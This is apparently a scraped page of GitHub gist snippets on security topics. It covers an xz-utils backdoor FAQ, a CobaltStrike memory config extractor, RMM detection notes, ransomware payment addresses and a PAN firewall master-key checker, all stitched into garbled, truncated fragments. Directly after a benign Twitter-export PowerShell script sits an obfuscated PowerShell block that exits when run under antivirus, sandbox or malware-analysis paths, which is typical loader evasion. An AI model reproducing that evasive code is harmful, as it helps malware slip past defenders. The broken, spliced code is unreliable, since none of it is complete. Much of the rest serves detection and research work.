Dan danzek

[
"928350122843193385",
"1185047194261274665",
"956202276408688650",
"956104664821157918",
"1185047092478095443",
"1185046791826178099",
"1185047045413797898",
"928483283698851901",
"1185047444619284641",
#!/usr/bin/env python3
import ctypes
import time
import threading
def test():
def access(path):
f = open(path, 'rb')
__ = f.read(8192)
There appears to be a string encoded in the binary payload:
https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01#file-hashes-txt-L115
Which functions as a killswitch:
https://piaille.fr/@zeno/112185928685603910
Thus, one workaround for affected systems might be to add this to `/etc/environment`:
@thesamesam
thesamesam / xz-backdoor.md
Last active May 19, 2024 20:15
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that

@heck-gd
heck-gd / cs_volatility_config.py
Created October 13, 2023 11:51
CobaltStrike Volatility Config Extractor
from __future__ import annotations
import re
from itertools import cycle
MAX_SETTINGS = 128
def load_mapping(filename: str) -> dict[int, int]:
"""Processes textual Volatility memmap output into a page mapping."""
@brokensound77
brokensound77 / RMM-detection.md
Last active March 23, 2024 18:04
Detection Engineering: RMM analysis

Detecting RMM

The most difficult challenge with RMM detection is contextual awareness around usage to determine if it is valid or malicious.

  • if the software is not used in the environment
    • could it be legitimate use by a random employee?
    • is it an attacker BYOL?
    • even so, all occurrences could probably be considered suspicious
  • if it is used in the environment
    • is every use of it legitimate? Probably not
  • this also creates significant living off the land (LOL) opportunity
@cablej
cablej / ESXi ransomware payment addresses
Last active February 26, 2023 22:32
A list of ESXi ransomware payment addresses from https://ransomwhe.re/, collected from Censys and Shodan.
15m7FP7U4kDJhAVtjjUdUB8WYswpf7Dtho
1Nm2TMEFEdyb2BP6tLyuREoKECztibuK6P
1LJYrTxrQA5pFRRg2bSyJLT6MGezmMBVfX
1EiCssanXmavzjtffYHzK6aVeQHngUxX1s
1H65AnxCg7mT4rTZmRzH8cxENk1N12rhkZ
1CVbdRQQ3TeWaPWqARKP9wvAEPvavJDrKo
1B9APV4ARm26MUW74ZcGNQE9hBHM5XGPbg
14u8xH6KdJFoTP93Lep9tpb1KQQvshQaAj
145V8AXLZpFv1ABVEsMYFsGpaZPwgKNZbf
1LGBP4iwrwv3GxybQ5QZJ19M3MAP76cw6U
@LeeHolmes
LeeHolmes / Get-TwitterThread.ps1
Created November 15, 2022 17:57
Recover your Twitter threads from your Twitter export data
$tweetJson = (Get-Content .\tweets.js -Raw).Substring("window.YTD.tweets.part0 =".Length)
$tweets = $tweetJson | ConvertFrom-Json
$currentThread = ""
foreach($currentTweetJson in $tweets)
{
$currentTweet = $currentTweetJson.tweet
if($currentTweet.in_reply_to_screen_name -eq "Lee_Holmes")
{
$Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s'); Set ("{1}{0}"-f'e','PdWj') ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ; ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN"
if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast')) {exit}
if (${SCR`IP`TP`ATh} -match "avg") {exit}
if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp')) {exit}
if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit}
if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a')) {exit}
if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo')) {exit}
if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus')) {exit}
@rqu1
rqu1 / checkmk.py
Last active November 13, 2023 22:07
check if a PAN firewall is using the default master key when globalprotect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'
class PanCrypt():